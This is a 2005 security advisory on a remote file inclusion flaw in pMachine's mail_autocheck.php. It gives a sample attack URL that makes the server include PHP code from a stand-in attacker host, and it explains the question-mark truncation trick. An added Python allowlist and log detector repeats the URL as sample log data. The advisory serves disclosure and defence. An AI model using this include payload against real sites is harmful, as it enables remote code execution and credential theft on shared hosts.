
pmachineExec.txt

Posted Feb 25, 2005
Authored by Kingcope

A lack of variable sanitizing in PMachine online publishing tools allows for remote command execution as the webserver uid.

tags | exploit, remote
SHA-256 | ab8fc76302a0a123e56195c679505ef1828d4ebb0b8c213d36d40d75809bfbae

pMachine Pro / pMachine Free Remote Code Execution
vendor website: http://www.pmachine.com

I. BACKGROUND
PMachine is one of the most flexible & creative on-line publishing
tools available. With PMachine you can publish any kind of
web content - from a basic weblog to an advanced, interactive magazine.
Easy to use, even for those new to BLOGing!
Even the most inexperienced user can have their weblog up and running
in 10 minutes or less.

II. DESCRIPTION
A remote attacker is able to execute commands with the privileges
of the underlying webserver. Under certain circumstances the attacker
may also be able to escalate privileges and gain full access to the
affected system.

The file containing the vulnerability is placed at

pm/add_ons/mail_this_entry/mail_autocheck.php

from the pMachine root directory. This file contains the following
PHP code:

<?php include($pm_path."mailserver".$sfx); ?>

Because no check is performed on the user-supplied $pm_path variable, it
is possible to include a remote PHP script and take advantage of
this typical PHP include() vulnerability.

The following is a sample attack against a pMachine hosting server:
http://targetserver/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?

The question mark at the very end of this URL truncates the appended
"mailserver".$sfx of the vulnerable pMachine code: the remote server
receives it as a query string, so the included file is malicious-code.php.
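As an added example (not part of the advisory or of pMachine's own code), a Python script with two defender-side pieces: an allowlist check that would have made the include() safe by rejecting stream wrappers and paths outside the install root, and a detector that flags access-log requests to mail_autocheck.php whose pm_path parameter would fail that check. The install root and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs

# Assumed pMachine install root; the advisory names no deployment path.
INSTALL_ROOT = "/var/www/pmachine/pm"


def is_safe_pm_path(pm_path: str, install_root: str = INSTALL_ROOT) -> bool:
    """True only if pm_path can be used in include() without pulling code
    through a stream wrapper (http://, ftp://, php://, data:) or leaving
    install_root, the two things the unchecked $pm_path allowed."""
    if not pm_path or "\0" in pm_path:
        return False
    # Any scheme prefix means a wrapper, not a directory on disk.
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*:", pm_path):
        return False
    # Resolve relative to the install root and refuse anything that escapes it.
    root = os.path.realpath(install_root)
    target = os.path.realpath(os.path.join(root, pm_path))
    return target == root or target.startswith(root + os.sep)


# Constructed Apache-style access-log lines: one normal page view, the
# advisory's sample URL, the same URL percent-encoded, and a benign value.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Feb/2005:10:00:01 +0100] "GET /pMachine/pm/index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [25/Feb/2005:10:00:02 +0100] "GET /pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php? HTTP/1.1" 200 312',
    '10.0.0.9 - - [25/Feb/2005:10:00:03 +0100] "GET /pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http%3A%2F%2Fattackers-webserver%2Fmalicious-code.php%3F HTTP/1.1" 200 312',
    '10.0.0.7 - - [25/Feb/2005:10:00:04 +0100] "GET /pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=./ HTTP/1.1" 200 88',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def flag_unsafe_includes(log_lines):
    """Return (line_no, decoded pm_path) for requests to mail_autocheck.php
    whose pm_path would be rejected by is_safe_pm_path."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m or "mail_autocheck.php" not in m.group(1):
            continue
        # parse_qs percent-decodes, so the encoded variant is caught too.
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get("pm_path", []):
            if not is_safe_pm_path(value):
                hits.append((n, value))
    return hits


if __name__ == "__main__":
    for line_no, value in flag_unsafe_includes(SAMPLE_LOG):
        print(f"line {line_no}: unsafe pm_path={value!r}")
```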

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary commands
and code under the privileges of the web server. This also opens the
door to privilege escalation attacks.
In conjunction with other unpatched vulnerabilities (the recent curl issue)
the attacker is able to read any file on the system even without
escalating privileges, for example to read out secret account
credentials on a shared web hosting server.

IV. DETECTION
The latest pMachine Pro and pMachine Free release is vulnerable to
the attack described above.

kcope - kingcope[at]gmx.net
